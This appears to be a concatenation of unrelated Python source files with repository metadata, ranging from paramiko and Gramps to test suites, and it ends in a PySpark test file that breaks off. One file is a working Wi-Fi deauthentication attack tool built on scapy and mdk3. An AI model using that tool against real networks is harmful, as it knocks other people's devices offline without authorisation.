Determine if a shell command will be executed for the client. If this
method returns ``True``, the channel should be connected to the stdin,
stdout, and stderr of the shell command.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the request arrived on.
:param str command: the command to execute.
:return:
``True`` if this channel is now hooked up to the stdin, stdout, and
stderr of the executing command; ``False`` if the command will not
be executed.
.. versionadded:: 1.1
"""
return False
def check_channel_subsystem_request(self, channel, name):
"""
Determine if a requested subsystem will be provided to the client on
the given channel. If this method returns ``True``, all future I/O
through this channel will be assumed to be connected to the requested
subsystem. An example of a subsystem is ``sftp``.
The default implementation checks for a subsystem handler assigned via
`.Transport.set_subsystem_handler`.
If one has been set, the handler is invoked and this method returns
``True``. Otherwise it returns ``False``.
.. note:: Because the default implementation uses the `.Transport` to
identify valid subsystems, you probably won't need to override this
method.
:param .Channel channel: the `.Channel` the pty request arrived on.
:param str name: name of the requested subsystem.
:return:
``True`` if this channel is now hooked up to the requested
subsystem; ``False`` if that subsystem can't or won't be provided.
"""
transport = channel.get_transport()
handler_class, larg, kwarg = transport._get_subsystem_handler(name)
if handler_class is None:
return False
handler = handler_class(channel, name, self, *larg, **kwarg)
handler.start()
return True
def check_channel_window_change_request(
self, channel, width, height, pixelwidth, pixelheight):
"""
Determine if the pseudo-terminal on the given channel can be resized.
This only makes sense if a pty was previously allocated on it.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the pty request arrived on.
:param int width: width of screen in characters.
:param int height: height of screen in characters.
:param int pixelwidth:
width of screen in pixels, if known (may be ``0`` if unknown).
:param int pixelheight:
height of screen in pixels, if known (may be ``0`` if unknown).
:return: ``True`` if the terminal was resized; ``False`` if not.
"""
return False
def check_channel_x11_request(
self, channel, single_connection, auth_protocol, auth_cookie,
screen_number):
"""
Determine if the client will be provided with an X11 session. If this
method returns ``True``, X11 applications should be routed through new
SSH channels, using `.Transport.open_x11_channel`.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the X11 request arrived on
:param bool single_connection:
``True`` if only a single X11 channel should be opened, else
``False``.
:param str auth_protocol: the protocol used for X11 authentication
:param str auth_cookie: the cookie used to authenticate to X11
:param int screen_number: the number of the X11 screen to connect to
:return: ``True`` if the X11 session was opened; ``False`` if not
"""
return False
def check_channel_forward_agent_request(self, channel):
"""
Determine if the client will be provided with an forward agent session.
If this method returns ``True``, the server will allow SSH Agent
forwarding.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the request arrived on
:return: ``True`` if the AgentForward was loaded; ``False`` if not
"""
return False
def check_channel_direct_tcpip_request(self, chanid, origin, destination):
"""
Determine if a local port forwarding channel will be granted, and
return ``OPEN_SUCCEEDED`` or an error code. This method is
called in server mode when the client requests a channel, after
authentication is complete.
The ``chanid`` parameter is a small number that uniquely identifies the
channel within a `.Transport`. A `.Channel` object is not created
unless this method returns ``OPEN_SUCCEEDED`` -- once a
`.Channel` object is created, you can call `.Channel.get_id` to
retrieve the channel ID.
The origin and destination parameters are (ip_address, port) tuples
that correspond to both ends of the TCP connection in the forwarding
tunnel.
The return value should either be ``OPEN_SUCCEEDED`` (or
``0``) to allow the channel request, or one of the following error
codes to reject it:
- ``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``
- ``OPEN_FAILED_CONNECT_FAILED``
- ``OPEN_FAILED_UNKNOWN_CHANNEL_TYPE``
- ``OPEN_FAILED_RESOURCE_SHORTAGE``
The default implementation always returns
``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``.
:param int chanid: ID of the channel
:param tuple origin:
2-tuple containing the IP address and port of the originator
(client side)
:param tuple destination:
2-tuple containing the IP address and port of the destination
(server side)
:return: an `int` success or failure code (listed above)
"""
return OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_channel_env_request(self, channel, name, value):
"""
Check whether a given environment variable can be specified for the
given channel. This method should return ``True`` if the server
is willing to set the specified environment variable. Note that
some environment variables (e.g., PATH) can be exceedingly
dangerous, so blindly allowing the client to set the environment
is almost certainly not a good idea.
The default implementation always returns ``False``.
:param channel: the `.Channel` the env request arrived on
:param str name: name
:param str value: Channel value
:returns: A boolean
"""
return False
def get_banner(self):
"""
A pre-login banner to display to the user. The message may span
multiple lines separated by crlf pairs. The language should be in
rfc3066 style, for example: en-US
The default implementation always returns ``(None, None)``.
:returns: A tuple containing the banner and language code.
.. versionadded:: 2.3
"""
return (None, None)
class InteractiveQuery (object):
"""
A query (set of prompts) for a user during interactive authentication.
"""
def __init__(self, name='', instructions='', *prompts):
"""
Create a new interactive query to send to the client. The name and
instructions are optional, but are generally displayed to the end
user. A list of prompts may be included, or they may be added via
the `add_prompt` method.
:param str name: name of this query
:param str instructions:
user instructions (usually short) about this query
:param str prompts: one or more authentication prompts
"""
self.name = name
self.instructions = instructions
self.prompts = []
for x in prompts:
if isinstance(x, string_types):
self.add_prompt(x)
else:
self.add_prompt(x[0], x[1])
def add_prompt(self, prompt, echo=True):
"""
Add a prompt to this query. The prompt should be a (reasonably short)
string. Multiple prompts can be added to the same query.
:param str prompt: the user prompt
:param bool echo:
``True`` (default) if the user's response should be echoed;
``False`` if not (for a password or similar)
"""
self.prompts.append((prompt, echo))
class SubsystemHandler (threading.Thread):
"""
Handler for a subsytem in server mode. If you create a subclass of this
class and pass it to `.Transport.set_subsystem_handler`, an object of this
class will be created for each request for this subsystem. Each new object
will be executed within its own new thread by calling `start_subsystem`.
When that method completes, the channel is closed.
For example, if you made a subclass ``MP3Handler`` and registered it as the
handler for subsystem ``"mp3"``, then whenever a client has successfully
authenticated and requests subsytem ``"mp3"``, an object of class
``MP3Handler`` will be created, and `start_subsystem` will be called on
it from a new thread.
"""
def __init__(self, channel, name, server):
"""
Create a new handler for a channel. This is used by `.ServerInterface`
to start up a new handler when a channel requests this subsystem. You
don't need to override this method, but if you do, be sure to pass the
``channel`` and ``name`` parameters through to the original
``__init__`` method here.
:param .Channel channel: the channel associated with this
subsystem request.
:param str name: name of the requested subsystem.
:param .ServerInterface server:
the server object for the session that started this subsystem
"""
threading.Thread.__init__(self, target=self._run)
self.__channel = channel
self.__transport = channel.get_transport()
self.__name = name
self.__server = server
def get_server(self):
"""
Return the `.ServerInterface` object associated with this channel and
subsystem.
"""
return self.__server
def _run(self):
try:
self.__transport._log(
DEBUG, 'Starting handler for subsystem {}'.format(self.__name)
)
self.start_subsystem(self.__name, self.__transport, self.__channel)
except Exception as e:
self.__transport._log(
ERROR,
'Exception in subsystem handler for "{}": {}'.format(
self.__name, e
)
)
self.__transport._log(ERROR, util.tb_strings())
try:
self.finish_subsystem()
except:
pass
def start_subsystem(self, name, transport, channel):
"""
Process an ssh subsystem in server mode. This method is called on a
new object (and in a new thread) for each subsystem request. It is
assumed that all subsystem logic will take place here, and when the
subsystem is finished, this method will return. After this method
returns, the channel is closed.
The combination of ``transport`` and ``channel`` are unique; this
handler corresponds to exactly one `.Channel` on one `.Transport`.
.. note::
It is the responsibility of this method to exit if the underlying
`.Transport` is closed. This can be done by checking
`.Transport.is_active` or noticing an EOF on the `.Channel`. If
this method loops forever without checking for this case, your
Python interpreter may refuse to exit because this thread will
still be running.
:param str name: name of the requested subsystem.
:param .Transport transport: the server-mode `.Transport`.
:param .Channel channel: the channel associated with this subsystem
request.
"""
pass
def finish_subsystem(self):
"""
Perform any cleanup at the end of a subsystem. The default
implementation just closes the channel.
.. versionadded:: 1.1
"""
self.__channel.close()
| e-gob/plataforma-kioscos-autoatencion | scripts/ansible-play/.venv/lib/python2.7/site-packages/paramiko/server.py | Python | bsd-3-clause | 30,482 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Checks IntEnum enhancement.
"""
from enum import IntEnum
import pytest
from ignitetest.utils.enum import constructible
@constructible
class ConnectType(IntEnum):
"""
Example of IntEnum.
"""
UDP = 0
TCP = 1
HTTP = 2
check_params = []
# pylint: disable=E1101
for name, value in ConnectType.__members__.items():
check_params.append([name, value])
check_params.append([int(value), value])
check_params.append([value, value])
# pylint: disable=no-self-use, no-member
class CheckEnumConstructible:
"""
Basic test of IntEnum decorated with @constructible.
"""
@pytest.mark.parametrize(
['input_value', 'expected_value'],
check_params
)
def check_construct_from(self, input_value, expected_value):
"""Basic checks."""
with ConnectType.construct_from(input_value) as conn_type:
assert conn_type is expected_value
@pytest.mark.parametrize(
['input_value'],
[[val] for val in [-1, .6, 'test']]
)
def check_invalid_input(self, input_value):
"""Check invalid input."""
with pytest.raises(Exception):
ConnectType.construct_from(input_value)
def check_invalid_usage(self):
"""Check invalid type decoration."""
with pytest.raises(AssertionError):
class SimpleClass:
"""Cannot be decorated"""
constructible(SimpleClass)
| ascherbakoff/ignite | modules/ducktests/tests/checks/utils/check_enum_constructible.py | Python | apache-2.0 | 2,219 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from subprocess import Popen,PIPE
from scapy.all import *
from Dns_Func import frm_dhcp_Attack
import threading
from os import popen,system,getuid,path,makedirs,getcwd
from re import search,compile,match
from Core.Settings import frm_Settings
from Modules.fuc_airodump import airdump_start,get_network_scan
class frm_window(QMainWindow):
def __init__(self, parent=None):
super(frm_window, self).__init__(parent)
self.form_widget = frm_deauth(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("Deauth Attack wireless Route")
self.setWindowIcon(QIcon('rsc/icon.png'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
if theme != "theme2":
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
else:
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'About Exit',"Are you sure to quit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
if getuid() == 0:
system("airmon-ng stop wlan0mon")
system("clear")
self.deleteLater()
else:
pass
else:
event.ignore()
class frm_deauth(QWidget):
def __init__(self, parent=None):
super(frm_deauth, self).__init__(parent)
self.Main = QVBoxLayout()
self.interface = "wlan0"
self.xmlcheck = frm_Settings()
self.ap_list = []
self.pacote = []
self.control = None
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
self.window_qt()
def select_target(self):
item = self.tables.selectedItems()
if item != []:
self.linetarget.setText(item[2].text())
else:
QMessageBox.critical(self, "Error in row", "Nothing row in tables, please try scan network again")
self.linetarget.clear()
def window_qt(self):
self.controlador = QLabel("")
self.attack_OFF()
self.form0 = QFormLayout()
self.form1 = QFormLayout()
self.form2 = QFormLayout()
self.list = QListWidget()
self.list.clicked.connect(self.list_clicked)
self.list.setFixedHeight(20)
self.tables = QTableWidget(5,3)
self.tables.setFixedWidth(350)
self.tables.setRowCount(100)
self.tables.setFixedHeight(200)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.select_target)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,60)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.linetarget = QLineEdit()
self.input_client = QLineEdit(self)
self.input_client.setText("FF:FF:FF:FF:FF:FF")
self.btn_enviar = QPushButton("Send Attack", self)
self.btn_enviar.clicked.connect(self.attack_deauth)
self.btn_scan = QPushButton(" Network Scan ", self)
self.btn_scan.clicked.connect(self.exec_sniff)
self.btn_stop = QPushButton("Stop Attack ", self)
self.btn_stop.clicked.connect(self.kill_thread)
self.btn_enviar.setFixedWidth(170)
self.btn_stop.setFixedWidth(170)
#icons
self.btn_scan.setIcon(QIcon("rsc/network.png"))
self.btn_enviar.setIcon(QIcon("rsc/start.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.w_pacote = QComboBox(self)
self.w_pacote.addItem("1000 ")
self.w_pacote.addItem("2000 ")
self.w_pacote.addItem("3000 ")
self.w_pacote.addItem("4000 ")
self.w_pacote.addItem("5000 ")
self.w_pacote.addItem("10000 ")
self.w_pacote.addItem("infinite loop")
self.time_scan = QComboBox(self)
self.time_scan.addItem("10s")
self.time_scan.addItem("20s")
self.time_scan.addItem("30s")
self.get_placa = QComboBox(self)
Interfaces = frm_dhcp_Attack()
n = Interfaces.placa()
for i,j in enumerate(n):
if search("wlan", j):
self.get_placa.addItem(n[i])
self.form0.addRow("Network scan time:", self.time_scan)
self.form1.addRow(self.tables)
self.form1.addRow(self.get_placa, self.btn_scan)
self.form1.addRow("Target:", self.linetarget)
self.form1.addRow("Packet:",self.w_pacote)
self.form1.addRow("Client:", self.input_client)
self.form1.addRow("Status Attack:", self.controlador)
self.form2.addRow(self.btn_enviar, self.btn_stop)
self.Main.addLayout(self.form0)
self.Main.addLayout(self.form1)
self.Main.addLayout(self.form2)
self.setLayout(self.Main)
self.logo = QPixmap(getcwd() + "/rsc/peh4.jpg")
self.label_imagem = QLabel()
self.label_imagem.setPixmap(self.logo)
self.form0.addRow(self.label_imagem)
def scan_diveces_airodump(self):
dirpath = "Settings/Dump"
if not path.isdir(dirpath):
makedirs(dirpath)
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
exit_air = airdump_start()
self.fix = False
if exit_air == None:
self.cap = get_network_scan()
if self.cap != None:
for i in self.cap:
i = i.split("||")
if self.check_is_mac(i[2]):
Headers = []
self.data['Channel'].append(i[0])
self.data['Essid'].append(i[1])
self.data['Bssid'].append(i[2])
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
self.cap =[]
def kill_thread(self):
self.attack_OFF()
self.control = 1
dat = self.xmlcheck.xmlSettings("item1","deauth_mdk3",None,False)
if dat == "True":
popen("killall xterm")
def exec_sniff(self):
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
dot =1
count = 0
self.options_scan = self.xmlcheck.xmlSettings("monitor0", "scan_scapy", None, False)
if self.get_placa.currentText() == "":
QMessageBox.information(self, "Network Adapter", 'Network Adapter Not found try again.')
else:
comando = "ifconfig"
proc = Popen(comando,stdout=PIPE, shell=False)
data = proc.communicate()[0]
if search("wlan0", data):
dot = 0
c = "airmon-ng stop wlan0mon".split()
Popen(c,stdout=PIPE, shell=False)
system("airmon-ng start %s" %(self.get_placa.currentText()))
else:
system("airmon-ng start %s" %(self.get_placa.currentText()))
if self.time_scan.currentText() == "10s":
count = 10
elif self.time_scan.currentText() == "20s":
count = 20
elif self.time_scan.currentText() == "30s":
count = 30
if self.options_scan == "True":
sniff(iface=self.interface, prn =self.Scanner_devices, timeout=count)
t = len(self.ap_list) -1
i = 0
items = []
cap = []
for i in range(t):
if len(self.ap_list[i]) < len(self.ap_list[i+1]):
if i != 0:
for index in xrange(self.list.count()):
items.append(self.list.item(index))
if self.ap_list[i] or self.ap_list[i+1] in items:
pass
else:
self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
else:
self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
else:
self.list.addItem(self.ap_list[i+1] + " " + self.ap_list[i])
if not (self.ap_list[i+1] + " " + self.ap_list[i]) in cap:
cap.append(self.ap_list[i+1] + " " + self.ap_list[i])
if self.ap_list[i] < i:
pass
break
else:
dot = 1
self.list.clear()
for i in cap:
dat = i.split()
if self.check_is_mac(dat[3]):
self.data['Channel'].append(dat[0])
self.data['Essid'].append(dat[2])
self.data['Bssid'].append(dat[3])
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
cap = []
self.ap_list = []
else:
self.thread_airodump = threading.Thread(target=self.scan_diveces_airodump)
self.thread_airodump.daemon = True
self.thread_airodump.start()
def Scanner_devices(self,pkt):
if pkt.type == 0 and pkt.subtype == 8:
if pkt.addr2 not in self.ap_list:
self.ap_list.append(pkt.addr2)
self.ap_list.append(str(int(ord(pkt[Dot11Elt:3].info)))+" | " + pkt.info)
print "AP MAC: %s with SSID: %s CH %d"%(pkt.addr2, pkt.info, int(ord(pkt[Dot11Elt:3].info)))
def attack_deauth(self):
if self.linetarget.text() == "":
QMessageBox.information(self, "Target Error", "Please, first select Target for attack")
else:
self.ss = None
if self.w_pacote.currentText() == "infinite loop":
self.ss = 1
else:
self.ss = int(self.w_pacote.currentText())
self.bssid = str(self.linetarget.text())
self.deauth_check = self.xmlcheck.xmlSettings("item0", "deauth_scapy",None,False)
self.args = self.xmlcheck.xmlSettings("mdk3","arguments", None, False)
if self.deauth_check == "True":
self.controlador.setText("[ ON ]")
self.controlador.setStyleSheet("QLabel { color : green; }")
self.t = threading.Thread(target=self.deauth_attacker, args=(self.bssid,str(self.input_client.text()), self.ss))
self.t.daemon = True
self.t.start()
else:
self.controlador.setText("[ ON ]")
self.controlador.setStyleSheet("QLabel { color : green; }")
self.t = threading.Thread(target=self.mdk3_attacker, args=(self.bssid,self.args,))
self.t.daemon = True
self.t.start()
def attack_OFF(self):
self.controlador.setText("[ OFF ]")
self.controlador.setStyleSheet("QLabel { color : red; }")
system("clear")
def mdk3_attacker(self,bssid,args):
n = (popen("""sudo xterm -geometry 75x15-1+200 -T "mdk3 Target: %s" -e mdk3 wlan0 %s %s & mdk3=$!"""%(bssid,args,bssid)).read()) + "exit"
while n != "dsa":
if n == "exit":
self.attack_OFF()
break
def deauth_attacker(self,bssid, client, count):
self.control = None
bot = 0
conf.verb = 0
conf.iface = self.interface
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
deauth_ap = Dot11(addr1=bssid, addr2=bssid, addr3=bssid)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=bssid, addr2=client, addr3=client)/Dot11Deauth()
self.pacote.append(deauth_pkt2)
self.pacote.append(deauth_ap)
if count == 1:
while count != 0:
try:
sendp(packet)
print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
if self.control == None:
pass
else:
self.attack_OFF()
count = 0
popen("clear")
except KeyboardInterrupt:
print "::"
sys.exit()
else:
for n in range(int(count)):
try:
sendp(packet)
print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
if self.control == None:
pass
else:
self.attack_OFF()
popen("clear")
break
except KeyboardInterrupt:
print "::"
sys.exit()
self.attack_OFF()
def check_is_mac(self,value):
checked = re.compile(r"""(
^([0-9A-F]{2}[-]){5}([0-9A-F]{2})$
|^([0-9A-F]{2}[:]){5}([0-9A-F]{2})$
)""",
re.VERBOSE|re.IGNORECASE)
if checked.match(value) is None:
return False
else:
return True
@pyqtSlot(QModelIndex)
def list_clicked(self, index):
itms = self.list.selectedIndexes()
for i in itms:
attack = str(i.data().toString()).split()
for i in attack:
if self.check_is_mac(i.replace(" ", "")):
self.linetarget.setText(str(i))
if self.linetarget.text() == "":
QMessageBox.information(self, "MacAddress", "Error check the Mac Target, please set the mac valid.")
| hackerbolt-freelancer/PEH-wifi-attack | Modules/deauth_func.py | Python | mit | 15,370 |
from deap_algorithm import DeapAlgorithm
import numpy as np
import random
from deap import base
from deap import creator
from deap import tools
####Parameter
#Num_evaluations
class RandomSampler(DeapAlgorithm):
def __init__(self):
super(RandomSampler, self).__init__()
self.bootstrap_deap()
def _generate_individual(self):
ind = creator.Individual(random.uniform(0,self.config['grid_size'][i]) for i in range(2))
return ind
def bootstrap_deap(self):
creator.create("FitnessMinError", base.Fitness, weights=(-1.0,))
creator.create("Individual", list, fitness=creator.FitnessMinError)
self.toolbox = base.Toolbox()
self.toolbox.register("individual", self._generateIndividual)
self.toolbox.register("population", tools.initRepeat, list, self.toolbox.individual)
self.toolbox.register("select", tools.selBest)
def run(self, case, logger):
self.config['grid_size'] = case.config['grid_size']
self.toolbox.register("evaluate", case.fitness)
#Create a population of random individuals
pop = self.toolbox.population(n=case.getMaxEvalutions())
# Evaluate the individuals
fitnesses = self.toolbox.map(self.toolbox.evaluate, pop)
for ind, fit in zip(pop, fitnesses):
ind.fitness.values = fit
#Pick the best individual
best_ind = tools.selBest(pop, 1)[0]
if logger is not None:
logger.updateLog( pop, 0, len(pop))
return pop, best_ind, best_ind.fitness.values[0]
def get_configs(self, case):
configs = []
config = {}
configs.append(config)
return configs
| ForsvaretsForskningsinstitutt/Paper-NLLS-speedup | algorithms/random_sampler.py | Python | gpl-3.0 | 1,799 |
from test.fixtures import make_test_env, make_fake_space
from wsgi_intercept import httplib2_intercept
import wsgi_intercept
import httplib2
import simplejson
from base64 import b64encode
from tiddlyweb.model.bag import Bag
from tiddlyweb.model.tiddler import Tiddler
from tiddlyweb.model.user import User
def setup_module(module):
make_test_env(module)
httplib2_intercept.install()
wsgi_intercept.add_wsgi_intercept('0.0.0.0', 8080, app_fn)
wsgi_intercept.add_wsgi_intercept('cdent.0.0.0.0', 8080, app_fn)
wsgi_intercept.add_wsgi_intercept('bar.example.com', 8080, app_fn)
make_fake_space(module.store, 'cdent')
user = User('cdent')
user.set_password('cow')
module.store.put(user)
module.auth = b64encode('cdent:cow')
user = User('fnd')
user.set_password('pig')
module.store.put(user)
module.badauth = b64encode('fnd:pig')
module.http = httplib2.Http()
def teardown_module(module):
import os
os.chdir('..')
def test_mapspace_bag_correct():
bag = store.get(Bag('MAPSPACE'))
assert bag.name == 'MAPSPACE'
assert bag.policy.create == ['ANY']
assert bag.policy.write == ['NONE']
def test_mapspace_validator():
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/foo.example.com',
method='PUT',
headers={'Content-Type': 'application/json'},
body='{"text": ""}')
# cannot create without user
assert response['status'] == '403'
# can create with user
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/foo.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % auth},
body='{"text": ""}')
assert response['status'] == '204'
# cannot write even with user
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/foo.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % auth},
body='{"text": ""}')
assert response['status'] == '403'
tiddler = store.get(Tiddler('foo.example.com', 'MAPSPACE'))
assert tiddler.fields['mapped_space'] == 'cdent'
def test_mapspace_non_member():
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/bar.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % badauth},
body='{"text": ""}')
assert response['status'] == '409'
assert 'non member may not map space'
def test_mapspace_twice():
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/bar.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % auth},
body='{"text": ""}')
assert response['status'] == '204'
tiddler = store.get(Tiddler('bar.example.com', 'MAPSPACE'))
assert tiddler.fields['mapped_space'] == 'cdent'
def test_mapspace_maps():
response, content = http.request('http://cdent.0.0.0.0:8080/bags.json')
assert response['status'] == '200', content
info = simplejson.loads(content)
assert 'cdent_public' in info
response, content = http.request('http://bar.example.com:8080/bags.json')
assert response['status'] == '200'
info = simplejson.loads(content)
assert 'cdent_public' in info
| FND/tiddlyspace | test/test_mapspace.py | Python | bsd-3-clause | 3,636 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id: _HasCitation.py 18548 2011-12-04 17:09:17Z kulath $
"""
Filter rule to match family with a particular citation.
"""
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....ggettext import gettext as _
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from .._hascitationbase import HasCitationBase
#-------------------------------------------------------------------------
#
# HasEvent
#
#-------------------------------------------------------------------------
class HasCitation(HasCitationBase):
"""Rule that checks for a family with a particular value"""
labels = [ _('Volume/Page:'),
_('Date:'),
_('Confidence level:')]
name = _('Place with the <citation>')
description = _("Matches places with a citation of a particular "
"value")
| arunkgupta/gramps | gramps/gen/filters/rules/place/_hascitation.py | Python | gpl-2.0 | 1,939 |
#
# Copyright (c) 2011 xGrab Development Team
#
# This file is part of xGrab
#
# xGrab is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# xGrab is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with xGrab. If not, see <http://www.gnu.org/licenses/>.
#
import gtk
from xgrab import data_file_path
class GtkGUI:
""" xGrab GUI """
def __init__(self):
""" Initialize the GUI """
glade_file = data_file_path('main.glade')
builder = gtk.Builder()
builder.add_from_file(glade_file)
builder.connect_signals(self)
@classmethod
def gtk_main_quit(cls, error):
""" Handle quit event """
gtk.main_quit()
| EverlastingFire/xGrab | xgrab/gui.py | Python | gpl-3.0 | 1,116 |
#!/usr/bin/env python
# coding: utf-8
from __future__ import (
print_function,
unicode_literals,
absolute_import
)
import argparse
import json
import os
def get_path():
return unicode(os.path.abspath('.'))
def parse_args():
_parser = argparse.ArgumentParser()
_parser.add_argument('--fixture', type=str, help='fixture file to load', default='properties.json')
_parser.add_argument('--fixture_folder', type=str,
default='models/fixtures',
help='where fixtures are stored.'
)
return _parser.parse_args()
def main(base_path):
properties_to_save = []
args = parse_args()
path = os.path.sep.join([base_path,
'app',
args.fixture_folder,
args.fixture])
with open(path) as file_:
data = json.load(file_)
properties = data['properties']
for property_ in properties:
property_.pop('id')
properties_to_save.append(Property(**property_))
Property.objects.insert(properties_to_save)
return len(properties_to_save)
if __name__ == '__main__':
from app.models.properties import Property
base_path = get_path()
out = main(base_path)
print("{} objects saved".format(out)) | IuryAlves/code-challenge | app/load_data.py | Python | mit | 1,329 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime, timedelta
import hashlib
import os
import random
import sys
import tempfile
import time
from glob import glob
from py4j.protocol import Py4JJavaError
from pyspark import shuffle, RDD
from pyspark.resource import ExecutorResourceRequests, ResourceProfile, ResourceProfileBuilder,\
TaskResourceRequests
from pyspark.serializers import CloudPickleSerializer, BatchedSerializer, PickleSerializer,\
MarshalSerializer, UTF8Deserializer, NoOpSerializer
from pyspark.testing.utils import ReusedPySparkTestCase, SPARK_HOME, QuietTest
if sys.version_info[0] >= 3:
xrange = range
global_func = lambda: "Hi"
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_to_localiterator(self):
rdd = self.sc.parallelize([1, 2, 3])
it = rdd.toLocalIterator()
self.assertEqual([1, 2, 3], sorted(it))
rdd2 = rdd.repartition(1000)
it2 = rdd2.toLocalIterator()
self.assertEqual([1, 2, 3], sorted(it2))
def test_to_localiterator_prefetch(self):
# Test that we fetch the next partition in parallel
# We do this by returning the current time and:
